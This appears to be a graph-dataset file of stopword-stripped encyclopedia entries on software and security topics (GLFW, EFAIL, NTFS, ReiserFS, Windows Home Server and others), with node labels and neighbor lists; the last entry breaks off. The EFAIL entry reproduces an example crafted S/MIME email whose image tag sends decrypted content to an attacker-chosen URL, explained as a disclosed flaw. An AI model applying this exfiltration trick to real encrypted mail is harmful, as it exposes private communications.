node_id
int64
0
76.9k
label
int64
0
39
text
stringlengths
13
124k
neighbors
listlengths
0
3.32k
mask
stringclasses
4 values
2,186
2
GLFW:glfw glfw lightweight utility library use opengl glfw stands graphics library framework provides programmers ability create manage windows opengl contexts well handle joystick keyboard mouse input glfw small c library allows creation management windows opengl contexts making also possible use multiple monitors video modes provides access input keyboard mouse joysticks api provides thin multi-platform abstraction layer primarily applications whose sole graphics output opengl api glfw useful developing multi-platform opengl applications single-platform developers also benefit avoiding deal kludgy platform-specific apis possible reason libraries like glfw needed opengl provide mechanisms creating necessary context managing windows user input timing etc several libraries available aiding opengl development common ones freeglut open source implementation glut sdl however freeglut mostly concerned providing stable clone glut sdl large people never opengl main focus glfw predicated assumption room lightweight modern library managing opengl contexts windows input glfw design although glfw written c bindings exist use api programming languages including ada c common lisp go haskell java python rebol red ruby rust among others glfw version 3.2 experimental support wayland compile-time flags
[ 6016, 3876, 8554, 428, 5165, 2062, 5612, 5677, 6797, 7889, 7983, 9245, 9454, 3734, 10480, 11221, 1435, 2045 ]
None
2,187
4
EFAIL:efail efail also written efail security hole email systems content transmitted encrypted form gap allows attackers access decrypted content email contains active content like html javascript loading external content enabled client affected email clients include gmail apple mail microsoft outlook two related common vulnerabilities exposures ids issued security gap made public 13 may 2018 damian poddebniak christian dresen jens müller fabian ising sebastian schinzel simon friedberger juraj somorovsky jörg schwenk part contribution 27th usenix security symposium baltimore august 2018 result vulnerability content attacked encrypted email transmitted attacker plain text vulnerable email client used encryption keys disclosed security gap concerns many common email programs used email encryption systems openpgp s/mime attacker needs access attacked email message encrypted form well ability send email least one regular recipient original email exploit security gap attacker modifies encrypted email causing recipient email program send decrypted content email attacker access decrypted content encrypted email attacker modifies email attacked contain text prepared attacker specific way attacker sends changed email one regular recipients attacker inserts additional text encrypted text encrypted email thereby changing message multipart/mixed mime message created encrypted part message appears together limit marks mime message parameter value html tag example modified s/mime mail content-type multipart/mixed boundary= boundary -- boundary content-type text/html img src= http //attacker.chosen.url -- boundary content-type application/pkcs7-mime content-transfer-encoding base64 encryptedmessageencryptedmessageencryptedmessageencryptedmessage -- boundary content-type text/html -- boundary email client first breaks multipart message individual parts using codice_1 tag decrypts encrypted parts reassembles multipart message receives message way content-type multipart/mixed boundary= boundary -- boundary content-type text/html img src= http //attacker.chosen.url secretmessagesecretmessage -- boundary message contains decrypted content email codice_2 attribute codice_3 tag passed email program url web server codice_4 controlled attacker content requested attacker retrieve content encrypted message web server logs variant attack attacker uses vulnerability cbc s/mime cfb openpgp operating modes encryption algorithms used allows change ciphertext inserting gadgets side effect manipulation originally contained plain text becomes illegible known attacker correct inserting additional gadgets attacker hide unknown plain text inserting certain html tags result message similar structure described since vulnerability directed content email recipient necessary recipients implement countermeasures include extent even senders encrypted content reduce vulnerability e.g electronic signatures limitation subset mime formats yet conclusively clarified announcing security vulnerability 13 may 2018 electronic frontier foundation eff recommended stop using pgp plugins email programs even though vulnerability directly relate pgp configuration email program coordinated publication originally scheduled 15 may eff criticized ignoring various parties consequence robert hansen recommended establish closed group mailing list better coordinate publication future security issues still saw eff director danny o'brien best entity administer openpgp disclosure group
[ 1024, 5636, 4117, 8726, 535, 9761, 4644, 4133, 1608, 3657, 8779, 8283, 4703, 8288, 8292, 10875, 3711, 8320, 5764, 4240, 2709, 1688, 2717, 9375, 9904, 9395, 8886, 3789, 4304, 4314, 9435, 4830, 3807, 5349, 1254, 9451, 10477, 9460, 7418, 281...
Test
2,188
4
CAUCE:cauce cauce coalition unsolicited commercial email non-profit advocacy group works reduce amount unsolicited commercial email spam via legislation cauce founded 1997 participants usenet newsgroup news.admin.net-abuse.email spam-l mailing list cauce north america formed march 2007 merger first cauce cauce us cauce canada combining strengths two sibling cauce organizations cauce na all-volunteer consumer advocacy organization moved beyond original mission encouraging creation adoption anti-spam laws broader stance defending interests average internet user cauce chapters formed canada europe among first lobby effective antispam legislation australia cauce india formed late 1990s 2003 apcauce cauce asia pacific formed bring together cauce chapters asia pacific region hosts technical workshops policy roundtable regional update sessions regional network operator conferences sanog apricot also member anti-spyware coalition cauce around world
[ 2677 ]
Test
2,189
4
NeoAccel:neoaccel neoaccel multinational company sells computer network security products direct end-user oem relationships company best known ssl vpn-plus product related icaa tssl technology company headquartered san jose california usa development support offices navi mumbai pune india neoaccel founded 2004 former netscaler purchased citrix ceo founder michel susai netscaler developed technology currently accelerates 75 world internet traffic companies like google yahoo aol netscaler purchased citrix 2005 300 million neoaccel financial support venture capital infusions hotmail founder sabeer bhatia inventor prabhu goel 2006 neoaccel raised 4,000,000 baring private equity partners ntt leasing company headquartered san jose california development office navi mumbai india support center pune india sales center beijing jan 2011 neoaccel purchased vmware company holds two main patents secure communications ip based networks neoaccel flagship product ssl vpn-plus company claims fastest vpn available due use icaa tssl technologies product uses ssl transport often categorized ssl vpn although company markets 3rd generation vpn nac-plus companies network access control device released 2007
[ 5490, 939, 5371 ]
Validation
2,190
4
Risk_IT:risk risk provides end-to-end comprehensive view risks related use information technology similarly thorough treatment risk management tone culture top operational issues risk published 2009 isaca result work group composed industry experts academics different nations coming organizations ernst young ibm pricewaterhousecoopers risk management insight swiss life kpmg risk part business risk—specifically business risk associated use ownership operation involvement influence adoption within enterprise consists it-related events could potentially impact business occur uncertain frequency magnitude creates challenges meeting strategic goals objectives management business risk essential component responsible administration organization due importance overall business risk treated like key business risks risk framework explains risk enables users risk managed key business leaders inside organization technical issue department risk categorised different ways risk framework based principles enterprise risk management standards/frameworks committee sponsoring organizations treadway commission erm iso 31000 way risk could understood upper management risk built around following principles major risk communication flows effective information three domains risk framework listed contained processes three domain process contains number activities process detailed domain maturity model depicted link risk scenarios ultimate business impact needs established understand effect adverse events risk prescribe single method different methods available among risk scenarios hearth risk evaluation process scenarios derived two different complementary ways risk scenarios analysed determining frequency impact based risk factors purpose defining risk response bring risk line overall defined risk appetite organization risk analysis i.e residual risk within risk tolerance limits risk managed according four main strategies combination key risk indicators metrics capable showing organizaztion subject high probability subject risk exceeds defined risk appetite second important document risk practitioner guide made eight sections risk framework complements isaca ’ cobit provides comprehensive framework control governance business-driven information-technology-based it-based solutions services cobit sets good practices means risk management providing set controls mitigate risk risk sets good practices ends providing framework enterprises identify govern manage risk val allows business managers get business value investments providing governance framework val used evaluate actions determined risk management process risk accept factor analysis information risk terminology evaluation process comparison risk processes foreseen iso/iec 27005 standard see risk management risk management methodology risk management iso 27005 framework risk practitioner guide appendix 2 contains comparison iso 31000 risk practitioner guide appendix 4 contains comparison coso
[ 3552, 5636, 1479, 7979, 11567, 6902, 3323, 10717 ]
Test
2,191
9
Mruby:mruby mruby interpreter ruby programming language intention lightweight easily embeddable project headed yukihiro matsumoto 100 contributors currently working project mruby 1.0 supports ruby 2.1 core ap none standard library well able execute basic ruby code mruby also features bytecode compiler virtual machine well ability easily embedded integrated c c++ code similar manner lua tcl mruby 2.0.0 adds support several ruby 2.x methods beyond ruby 2.1. v2.0.0 also changed variable length bytecode instructions format mruby bytecode embedded c code thus compiled standalone executable mruby also aims compliant iso/iec 30170:2012 standard assuming mruby installed path following program compiled executed running following command terminal mruby includes minimalistic virtual machine used execute mruby bytecode nicknamed ritevm first command compiles ruby code mruby bytecode creating file called test.mrb executed appending -b flag normal interpreter arguments
[ 7430, 9229, 7695, 10771, 9245, 4777, 7983, 692, 564, 4277, 5945, 1852, 5567, 6338, 11208, 5578, 11221, 10973, 1379, 11625, 5612, 2804, 2045 ]
Test
2,192
4
Sourcefire_Vulnerability_Research_Team:sourcefire vulnerability research team sourcefire vulnerability research team vrt group network security engineers discovered assessed trends hacking activities intrusion attempts vulnerabilities members sourcefire vrt include clamav team well authors several standard security reference books articles sourcefire vrt also supported resources open source snort clamav communities group focuses developing vulnerability-based rules protect emerging exploits sourcefire customers snort users vrt provided zero-day protection outbreaks malware including conficker netsky nachi blaster sasser zotob nachi among others vrt also delivers rules provide day protection microsoft tuesday vulnerabilities develops official snort rules used sourcefire 3d system develops maintains official rule set snort.org maintains shared object rules distributed various platforms binary format following cisco acquisition sourcefire 2014 vrt combined cisco trac secapps security applications group form cisco talos
[ 7843, 2409, 7515, 5245, 3486 ]
Test
2,193
6
NTFS:ntfs ntfs new technology file system proprietary journaling file system developed microsoft starting windows nt 3.1 default file system windows nt family ntfs several technical improvements file systems superseded – file allocation table fat high performance file system hpfs – improved support metadata advanced data structures improve performance reliability disk space use additional extensions elaborate security system based access control lists acls file system journaling ntfs supported desktop server operating systems well linux bsd free open-source ntfs driver called ntfs-3g read write functionality macos comes read-only support ntfs disabled-by-default write support ntfs unstable mid-1980s microsoft ibm formed joint project create next generation graphical operating system result os/2 hpfs microsoft disagreed ibm many important issues eventually separated os/2 remained ibm project microsoft worked develop windows nt ntfs hpfs file system os/2 contained several important new features microsoft created new operating system borrowed many concepts ntfs original ntfs developers tom miller gary kimura brian andrew david goebel probably result common ancestry hpfs ntfs use disk partition identification type code 07 using partition id record number highly unusual since dozens unused code numbers available major file systems codes example fat nine one fat12 fat16 fat32 etc. algorithms identifying file system partition type 07 must perform additional checks distinguish hpfs ntfs microsoft released five versions ntfs version number e.g v5.0 windows 2000 based operating system version confused ntfs version number v3.1 since windows xp although subsequent versions windows added new file system-related features change ntfs example windows vista implemented ntfs symbolic links transactional ntfs partition shrinking self-healing ntfs symbolic links new feature file system others new operating system features make use ntfs features already place ntfs v3.0 includes several new features predecessors sparse file support disk use quotas reparse points distributed link tracking file-level encryption called encrypting file system efs ntfs optimized 4 kb clusters supports maximum cluster size 2mb earlier implementations support 64kb maximum ntfs volume size specification support clusters implementations achieve theoretical maximum discussed maximum ntfs volume size implemented windows xp professional clusters partly due partition table limitations example using 64kb clusters maximum size windows xp ntfs volume 256tb minus 64kb using default cluster size 4kb maximum ntfs volume size 16tb minus 4kb vastly higher 128gb limit windows xp sp1 partition tables master boot record mbr disks support partition sizes 2tb multiple guid partition table gpt dynamic volumes must combined create single ntfs volume larger 2tb booting gpt volume windows environment microsoft supported way requires system unified extensible firmware interface uefi 64-bit support ntfs maximum theoretical limit size individual files 16eib minus 1kb totals 18,446,744,073,709,550,592 bytes windows 10 version 1709 windows server 2019 maximum implemented file size 8pb minus 2mb 9,007,199,252,643,840 bytes ntfs journaling file system uses ntfs log logfile record metadata changes volume feature fat provide critical ntfs ensure complex internal data structures remain consistent case system crashes data moves performed defragmentation api allow easy rollback uncommitted changes critical data structures volume remounted notably affected structures volume allocation bitmap modifications mft records moves variable-length attributes stored mft records attribute lists indices directories security descriptors usn journal update sequence number journal system management feature records extend\ usnjrnl changes files streams directories volume well various attributes security settings journal made available applications track changes volume journal enabled disabled non-system volumes hard link feature allows different file names directly refer file contents hard links similar directory junctions refer files instead hard links may link files volume volume mft hard links file metadata change file size attributes one hard link may update others opened hard links originally included support posix subsystem windows nt windows uses hard links support short 8.3 filenames ntfs operating system support needed legacy applications work 8.3 filenames case additional filename record directory entry added 8.3 long file name linked updated together unlike regular hard link ntfs file system limit 1024 hard links file alternate data streams allow one data stream associated filename fork using format filename streamname e.g. text.txt extrastream ntfs streams introduced windows nt 3.1 enable services macintosh sfm store resource forks although current versions windows server longer include sfm third-party apple filing protocol afp products grouplogic extremez-ip still use feature file system small ads named zone.identifier added internet explorer recently browsers mark files downloaded external sites possibly unsafe run local shell would require user confirmation opening user indicates longer want confirmation dialog ads deleted alternate streams listed windows explorer size included file size file copied moved another file system without ads support user warned alternate data streams preserved warning typically provided file attached e-mail uploaded website thus using alternate streams critical data may cause problems microsoft provides tool called streams view streams selected volume starting windows powershell 3.0 possible manage ads natively six cmdlets add-content clear-content get-content get-item remove-item set-content malware used alternate data streams hide code result malware scanners special tools check alternate data streams ntfs compress files using lznt1 algorithm variant lz77 files compressed 16 cluster chunks 4 kb clusters files compressed 64 kb chunks compression algorithms ntfs designed support cluster sizes 4 kb cluster size greater 4 kb ntfs volume ntfs compression available compression reduces 64kb data 60kb less ntfs treats unneeded 4kb pages like empty sparse file clusters—they written allows reasonable random-access times os follow chain fragments however large compressible files become highly fragmented since every chunk smaller 64kb becomes fragment according research microsoft ntfs development team 50–60gb reasonable maximum size compressed file ntfs volume 4kb default cluster block size reasonable maximum size decreases sharply volumes smaller cluster sizes single-user systems limited hard disk space benefit ntfs compression small files 4kb 64kb depending compressibility files smaller approximately 900 bytes stored within directory entry mft flash memory ssd drives head movement delays hard disk drives fragmentation smaller penalty users fast multi-core processors find improvements application speed compressing applications data well reduction space used note ssds sandforce controllers already compress data however since less data transferred reduction i/os compression works best files repetitive content seldom written usually accessed sequentially compressed log files ideal example system files needed boot time drivers ntldr winload.exe bootmgr compressed system may fail boot correctly decompression filters yet loaded later editions windows allow important system files compressed files may compressed decompressed individually via changing advanced attributes drive directory directory tree becoming default files inside although read–write access compressed files mostly transparent microsoft recommends avoiding compression server systems and/or network shares holding roaming profiles puts considerable load processor sparse files files interspersed empty segments actual storage space used applications file looks like ordinary file empty regions seen regions filled zeros sparse file necessarily include sparse zeros areas sparse file attribute means file allowed database applications instance may use sparse files compressed files actual sizes sparse files taken account determining quota limits volume shadow copy service vss keeps historical versions files folders ntfs volumes copying old newly overwritten data shadow copy via copy-on-write technique user may later request earlier version recovered also allows data backup programs archive files currently use file system heavily loaded systems microsoft recommends setting shadow copy volume separate disk windows vista also introduced persistent shadow copies use system restore previous versions features persistent shadow copies however deleted older operating system mounts ntfs volume happens older operating system understand newer format persistent shadow copies windows vista applications use transactional ntfs txf group multiple changes files together single transaction transaction guarantee either changes happen none application outside transaction see changes committed uses similar techniques used volume shadow copies i.e copy-on-write ensure overwritten data safely rolled back clfs log mark transactions still committed committed still fully applied case system crash commit one participants transactional ntfs restrict transactions local ntfs volume also includes transactional data operations locations data stored separate volumes local registry sql databases current states system services remote services transactions coordinated network-wide participants using specific service dtc ensure participants receive commit state transport changes validated participant others invalidate local caches old data rollback ongoing uncommitted changes transactional ntfs allows example creation network-wide consistent distributed file systems including local live offline caches microsoft advises using txf microsoft strongly recommends developers utilize alternative means since txf may available future versions microsoft windows ntfs file folder assigned security descriptor defines owner contains two access control lists acls first acl called discretionary access control list dacl defines exactly type interactions e.g reading writing executing deleting allowed forbidden user groups users example files folder may read executed users modified user holding administrative privileges windows vista adds mandatory access control info dacls dacls primary focus user account control windows vista later second acl called system access control list sacl defines interactions file folder audited whether logged activity successful failed example auditing enabled sensitive files company managers get know someone tries delete make copy whether succeeds encrypting file system efs provides strong user-transparent encryption file folder ntfs volume efs works conjunction efs service microsoft cryptoapi efs file system run-time library fsrtl efs works encrypting file bulk symmetric key also known file encryption key fek used takes relatively small amount time encrypt decrypt large amounts data asymmetric key cipher used symmetric key used encrypt file encrypted public key associated user encrypted file encrypted data stored alternate data stream encrypted file decrypt file file system uses private key user decrypt symmetric key stored file header uses symmetric key decrypt file done file system level transparent user also case user losing access key support additional decryption keys built efs system recovery agent still access files needed ntfs-provided encryption ntfs-provided compression mutually exclusive however ntfs used one third-party tool support efs available basic home mediacenter versions windows must activated installation professional ultimate server versions windows using enterprise deployment tools within windows domains disk quotas introduced ntfs v3 allow administrator computer runs version windows supports ntfs set threshold disk space users may use also allows administrators keep track much disk space user using administrator may specify certain level disk space user may use receive warning deny access user hit upper limit space disk quotas take account ntfs transparent file-compression enabled applications query amount free space also see amount free space left user quota applied introduced ntfs v3 ntfs reparse points used associating reparse tag user space attribute file directory microsoft includes several default tags including symbolic links directory junction points volume mount points object manager parses file system name lookup encounters reparse attribute reparse name lookup passing user controlled reparse data every file system filter driver loaded windows filter driver examines reparse data see whether associated reparse point filter driver determines match intercepts file system request performs special functionality starting windows vista microsoft added built-in ability shrink expand partition however ability relocate page file fragments files marked unmovable shrinking volume often require relocating disabling page file index windows search shadow copy used system restore various third-party tools capable resizing ntfs partitions internally ntfs uses b-trees index file system data although complex implement allows faster file look times cases file system journal used guarantee integrity file system metadata individual files content systems using ntfs known improved reliability compared fat file systems ntfs allows sequence 16-bit values name encoding file names stream names index names etc except 0x0000 means utf-16 code units supported file system check whether sequence valid utf-16 allows sequence short values restricted unicode standard win32 namespace utf-16 code units case insensitive whereas posix namespace case sensitive file names limited 255 utf-16 code units certain names reserved volume root directory used files codice_1 codice_2 codice_3 codice_4 codice_5 codice_6 dot codice_7 codice_8 codice_9 codice_10 codice_11 codice_12 dot extend directories others files nt kernel limits full paths 32,767 utf-16 code units additional restrictions code points file names boot partition format roughly based upon earlier fat filesystem fields different locations fields especially sectors per track number heads hidden sectors fields may contain dummy values drives either make sense determinable os first looks 8 bytes 0x30 find cluster number mft multiplies number number sectors per cluster 1 byte found 0x0d value sector offset lba mft described ntfs file directory metafile data—file name creation date access permissions use access control lists size—are stored metadata master file table mft abstract approach allowed easy addition file system features windows nt development—an example addition fields indexing used active directory software also enables fast file search software locate named local files folders included mft quickly without requiring index mft structure supports algorithms minimize disk fragmentation directory entry consists filename file id record number representing file master file table file id also contains reuse count detect stale references strongly resembles w_fid files-11 ntfs structures radically differ two copies mft stored case corruption first record corrupted ntfs reads second record find mft mirror file locations files stored boot sector ntfs contains several files define organize file system respects files structured like user file volume peculiar direct interest file system clients metafiles define files back critical file system data buffer file system changes manage free space allocation satisfy bios expectations track bad allocation units store security disk space usage information content unnamed data stream unless otherwise indicated metafiles treated specially windows handled directly codice_13 driver difficult directly view special purpose-built tools needed windows 7 ntfs driver completely prohibits user access resulting bsod whenever attempt execute metadata file made one tool nfi.exe ntfs file sector information utility freely distributed part microsoft oem support tools example obtain information mft -master file table segment following command used codice_14 another way bypass restriction use 7-zip file manager go low-level ntfs path codice_15 codice_16 resembles drive/partition 3 new folders appear codice_17 codice_18 pseudo-folder 7-zip uses attach files deleted file system view codice_19 another pseudo-folder contains ntfs metadata files trick used removable devices usb flash drives external hard drives sd cards etc inside windows active partition requires offline access namely winre file directory described mft record linear repository stream descriptors also named attributes packed together one mft records containing so-called attributes list extra padding fill fixed 1 kb size every mft record fully describes effective streams associated file attribute attribute type fixed-size integer mapping attribute definition file attrdef optional attribute name example used name alternate data stream value represented sequence bytes ntfs standard data files alternate data streams index data directories stored attributes according attrdef attributes either resident non-resident data attribute contains file data example attribute resident represented flag value stored directly mft record otherwise clusters allocated data cluster location information stored data runs attribute attributes given file may displayed using nfi.exe ntfs file sector information utility freely distributed part microsoft oem support tools windows system calls may handle alternate data streams depending operating system utility remote file system file transfer might silently strip data streams safe way copying moving files use backupread backupwrite system calls allow programs enumerate streams verify whether stream written destination volume knowingly skip unwanted streams optimize storage reduce i/o overhead common case attributes small associated value ntfs prefers place value within attribute size attribute exceed maximum size mft record instead using mft record space list clusters containing data case attribute store data directly store allocation map form data runs pointing actual data stored elsewhere volume value accessed directly within attribute called resident data computer forensics workers amount data fits highly dependent file characteristics 700 800 bytes common single-stream files non-lengthy filenames acls allocation map stored form data runs compressed encoding data run represents contiguous group clusters store attribute value files multi-gb volume entry encoded 5 7 bytes means 1 kb mft record store 100 data runs however attribute_list also size limit dangerous 1 million fragments single file ntfs volume also implies general good idea use ntfs compression file larger 10gb ntfs file system driver sometimes attempt relocate data attributes made non-resident clusters also attempt relocate data stored clusters back attribute inside mft record based priority preferred ordering rules size constraints since resident files directly occupy clusters allocation units possible ntfs volume contain files volume clusters example 74.5gb partition ntfs formats 19,543,064 clusters 4kb subtracting system files 64mb log file 2,442,888-byte bitmap file 25 clusters fixed overhead leaves 19,526,158 clusters free files indices since four mft records per cluster volume theoretically could hold almost 4 × 19,526,158= 78,104,632 resident files opportunistic file locks oplocks allow clients alter buffering strategy given file stream order increase performance reduce network use oplocks apply given open stream file affect oplocks different stream oplocks used transparently access files background network client may avoid writing information file remote server process accessing data may buffer read-ahead data process writing data windows supports four different types oplocks opportunistic locks enhanced windows 7 windows server 2008 r2 per-client oplock keys windows nt descendants keep internal timestamps utc make appropriate conversions display purposes ntfs timestamps utc historical reasons versions windows support ntfs keep time internally local zone time therefore file systems – ntfs – supported current versions windows means files copied moved ntfs non-ntfs partitions os needs convert timestamps fly files moved daylight saving time dst effect files moved standard time effect ambiguities conversions result especially shortly one days local zone time changes users may observe files timestamps incorrect one hour due differences implementation dst different jurisdictions result potential timestamp error 4 hours given 12 months different ntfs versions part fully forward- backward-compatible technical considerations mounting newer ntfs volumes older versions microsoft windows affects dual-booting external portable hard drives example attempting use ntfs partition previous versions a.k.a volume shadow copy operating system support result contents previous versions lost windows command-line utility called convert.exe convert supporting file systems ntfs including hpfs windows nt 3.1 3.5 3.51 fat16 fat32 windows 2000 later windows 10 version 1709 known fall creators update microsoft requires onedrive file structure reside ntfs disk reparse tag every file directory within local onedrive file structure set recursive manner thus making file folder unusable previous version windows ntfs file system driver file system backup utilities updated support unknown whether recursive linking feature ntfs file system undocumented workaround microsoft support onedrive new files on-demand feature mac os x 10.3 later include read-only support ntfs-formatted partitions gpl-licensed ntfs-3g also works mac os x fuse allows reading writing ntfs partitions performance enhanced commercial version called tuxera ntfs mac also available ntfs-3g developers paragon software group sells read-write driver named ntfs mac os x also included models seagate hard drives native ntfs write support discovered mac os x 10.6 later activated default although workarounds exist enable functionality however user reports indicate functionality unstable tends cause kernel panics probably reason write support enabled advertised linux kernel versions 2.2.0 later include ability read ntfs partitions kernel versions 2.6.0 later contain driver written anton altaparmakov university cambridge richard russon supports file read overwrite resize three userspace drivers ntfsmount ntfs-3g captive ntfs 'wrapping driver uses windows driver ntfs.sys exist ntfs support built filesystem userspace fuse linux kernel module tasked bridging userspace kernel code save retrieve data three licensed terms gnu general public license gpl due complexity internal ntfs structures built-in 2.6.14 kernel driver fuse drivers disallow changes volume considered unsafe avoid corruption two proprietary solutions also exist ecomstation freebsd offer read-only ntfs support beta ntfs driver allows write/delete ecomstation generally considered unsafe free third-party tool beos based ntfs-3g allows full ntfs read write ntfs-3g free implementation ntfs initially developed linux also works macos freebsd netbsd openbsd ntfs-3g available ports solaris qnx haiku fuse free-for-personal-use read/write driver ms-dos avira called ntfs4dos ahead software developed ntfsread driver version 1.200 dr-dos 7.0x 2002 2004 part nero burning rom software openbsd offers native read-only ntfs support default i386 amd64 platforms version 4.9 released 1 may 2011
[ 2051, 10257, 8214, 8227, 8228, 10281, 2101, 2107, 8254, 10306, 10310, 4173, 4174, 4178, 6233, 4210, 6263, 6265, 8328, 139, 2193, 2194, 2196, 2197, 2199, 4248, 6297, 6309, 10405, 2221, 8369, 178, 2230, 8380, 10428, 2244, 8391, 200, 8398, 8...
Validation
2,194
6
ReiserFS:reiserfs reiserfs general-purpose journaled computer file system initially designed implemented team namesys led hans reiser reiserfs currently supported linux without quota support licensed gplv2 introduced version 2.4.1 linux kernel first journaling file system included standard kernel reiserfs default file system novell suse linux enterprise novell decided move ext3 october 12 2006 future releases namesys considered reiserfs version 3.6 introduced new on-disk format allowing bigger filesizes occasionally referred reiser3 stable feature-complete exception security updates critical bug fixes ceased development concentrate successor reiser4 namesys went business 2008 reiser conviction murder product maintained open source volunteers reiserfsprogs 3.6.27 released 25 july 2017 time introduction reiserfs offered features available existing linux file systems reiserfs stores file metadata stat items directory entries directory items inode block lists indirect items tails files direct items single combined b+ tree keyed universal object id disk blocks allocated nodes tree formatted internal blocks blocks leaf nodes items packed end-to-end formatted leaf blocks blocks unformatted blocks containing file contents directory items many entries indirect items long fit node spill right leaf neighbour block allocation tracked free space bitmaps fixed locations contrast ext2 berkeley ffs-like file systems time simply used fixed formula computing inode locations hence limiting number files may contain file systems also store directories simple lists entries makes directory lookups updates linear time operations degrades performance large directories single b+ tree design reiserfs avoids problems due better scalability properties regarding development filesystem three fields considered separately therefore section contains three tables one 3.5.x series filsystem driver used read write 3.5 on-disk format another one 3.6.x series filsystem driver used read write 3.6 on-disk format third one tools contained codice_1 package since on-disk format 3.6 regarded feature complete stable frozen n't get changed anymore filesystem driver linux part official kernel well codice_1 operating user space still maintained getting updates rarely also new features even nowadays 2019 codice_3 program never fully implemented although attempts year 2014 one reason never finished rise solid state disks ssd – contrary classic spinning wheel hard disk drives hdd – need defragmented precisely n't defragmented unnecessary write operations shorten life ssd compared ext2 ext3 version 2.4 linux kernel dealing files 4 kib tail packing enabled reiserfs may faster said great benefit usenet news spools http caches mail delivery systems applications performance small files critical however practice news spools use feature called cycbuf holds articles one large file fast http caches several revision control systems use similar approach nullifying performance advantages email servers reiserfs problematic due semantic problems explained also reiserfs problem fast filesystem aging compared filesystems — several usage scenarios filesystem performance decreased dramatically time linux 2.6.33 reiserfs heavily used big kernel lock bkl — global kernel-wide lock — scale well systems multiple cores critical code parts ever executed one core time reiserfs default file system suse linux since version 6.4 released 2000 switching ext3 suse linux enterprise 10.2/opensuse 11 announced 2006 jeff mahoney suse wrote post 14 september 2006 proposing move reiserfs ext3 default installation file system reasons mentioned scalability performance problems extended attributes acls small shrinking development community reiser4 incremental update requires reformat unreasonable people october 4 wrote response comment blog order clear issues wrote proposal switch unrelated hans reiser trial murder mahoney wrote concerned people would make connection none existed timing entirely coincidental motivation unrelated directory operations including unlink 2 synchronous reiserfs result data corruption applications relying heavily file-based locks mail transfer agents qmail postfix machine halts synchronized disk programs specifically defragment reiserfs file system although tools written automatically copy contents fragmented files hoping contiguous blocks free space found however repacker tool planned next reiser4 file system deal file fragmentation rise solid state disks problem became irrelevant contrary hard disk drives slow caused fragmentation ssds n't use moving parts even recommended abstain kind defragmentation ssds shorten lifetime tree rebuild process reiserfs fsck attracted much criticism *nix community file system becomes badly corrupted internal tree unusable performing tree rebuild operation may corrupt existing files introduce new entries unexpected contents action part normal operation normal file system check explicitly initiated confirmed administrator reiserfs v3 images stored reiserfs v3 partition e.g. backups disk images emulators without transforming e.g. compressing encrypting order avoid confusing rebuild reformatting existing reiserfs v3 partition also leave behind data could confuse rebuild operation make files old system reappear also allows malicious users intentionally store files confuse rebuilder metadata always consistent state file system check corruption means contents files merged unexpected ways contained file system metadata reiserfs successor reiser4 fixes problem reiserfs versions linux kernel 2.4.16 considered unstable namesys recommended production use especially conjunction nfs early implementations reiserfs prior linux 2.6.2 also susceptible out-of-order write hazards current journaling implementation reiserfs par ext3 ordered journaling level
[ 5120, 2564, 6669, 3598, 10257, 9236, 6677, 5142, 8214, 3611, 9249, 9762, 5158, 7225, 2107, 11323, 8772, 1109, 10851, 4708, 9319, 8298, 9836, 7789, 9333, 6263, 9335, 3708, 9343, 5256, 7818, 654, 2193, 2197, 2199, 6808, 11419, 3745, 6309, 1...
None
2,195
2
Linux_Mark_Institute:linux mark institute linux mark institute lmi fully lmi oregon llc organization administers linux trademark behalf linus torvalds computer software includes linux kernel computer hardware utilizing linux-based software services associated implementation documentation linux-based products linux trademark owned linus torvalds u.s. germany e.u. japan computer operating system software facilitate computer use operation assignment trademark torvalds occurred lawsuit attorney william r. della croce jr. boston registered trademark us september 1995 began 1996 send letters various linux distributors demanding ten percent royalties sales linux products petition della croce practices started early 1997 workgroup solutions yggdrasil linux journal linux international torvalds appealed original trademark assignment fraudulent obtained false pretenses november case settled torvalds owned trademark lmi originally charged nominal sublicensing fee use linux name part trademarks later changed favor offering free perpetual worldwide sublicense lmi headquartered monterey california least 2005 since least 2009 headquartered beaverton oregon
[ 2560, 4616, 7689, 3082, 5644, 5139, 9237, 10780, 4637, 10785, 3618, 11297, 6180, 9257, 1584, 8242, 9266, 4161, 10817, 8772, 6213, 8268, 589, 593, 2134, 3162, 2658, 6244, 5222, 10856, 6763, 4207, 5244, 4734, 11391, 7812, 8326, 7821, 4238, ...
Test
2,196
4
Windows_Home_Server:windows home server windows home server code-named quattro home server operating system microsoft announced 7 january 2007 consumer electronics show bill gates released manufacturing 16 july 2007 officially released 4 november 2007 windows home server based windows server 2003 r2 intended solution homes multiple connected pcs offer file sharing automated backups print server remote access paired windows home server console—client software accessed another computer network provide graphical management interface power pack 1 windows home server released 20 july 2008 power pack 2 released 24 march 2009 power pack 3 released 24 november 2009 windows home server 2011 next version operating system released 6 april 2011 microsoft confirmed windows home server 2011 last release windows home server product line configuration interface designed user-friendly enough could set without prior knowledge server administration configuration interface called home server console delivered remote desktop protocol application remote pcs application ran server gui rendered remote system home server console client application could accessed windows pc server required video card peripherals designed require ethernet card least one windows xp windows vista windows 7 computer windows home server drive extender file-based replication system provided three key capabilities drive extender users could add larger capacity hard disk drives could offline lesser capacity drives upgrade capacity online example user reaching capacity share five terabytes six-terabyte capacity used six one-terabyte drives user could offline one one-terabyte drives physically replace two-terabyte drive whs automatically equalizes redistribution used space across available drives regular basis offline process would compress used data across minimum amount drives allowing removal one lesser capacity drives replaced drive higher capacity system automatically redistribute used capacity among pool ensure space capacity drive users specifically configure family home server dealt storage two levels shared folders disks concepts relevant regarding disks whether added home server storage pool whether disk appeared healthy system contrast windows logical disk manager requires greater degree technical understanding order correctly configure raid array shared folders name description permissions flag indicating whether duplication redundancy folder duplication shared folder default multi-disk home server systems applicable single disk systems files shared folder duplicated effective storage capacity halved however situations user may wanted data duplicated e.g tv shows archived windows home server system running windows media center drive extender provided capability duplicate files server short capacity manually mark complete content store duplication known limitation drive extender cases changed timestamp directories files data moved around disks according microsoft expected behaviour caused unexpected behaviour using clients sort media based date examples xbmc mediaportal squeezebox server aforementioned programs worked fine whs however files may appeared order due caveat 23 november 2010 microsoft announced drive extender would removed windows home server 2011 led public outcry announcement comments section criticism drive extender removal mainly related seen core feature windows home server key reason adoption replacement drive extender microsoft stated oems would use raid windows home server products windows home server computer backup automatically backs computers home server using image-based system ensures point-in-time-based restoration either entire pcs specific files folders complete bare-metal restores initiated restore bootable cd file based restores initiated whs client software allows users open backup drag drop files technology uses volume shadow services vss technology client computer take image based backup running computer backup operates data cluster level single instancing performed minimize amount data travels network ultimately stored home server single instancing gives server ability store one instance data matter data originated another computer another file even data within file computer backup images duplicated server server hard drive fails backups could lost server backup feature added power pack 1 include duplication backup images system also offers ssl secured web browser based interface internet shared file 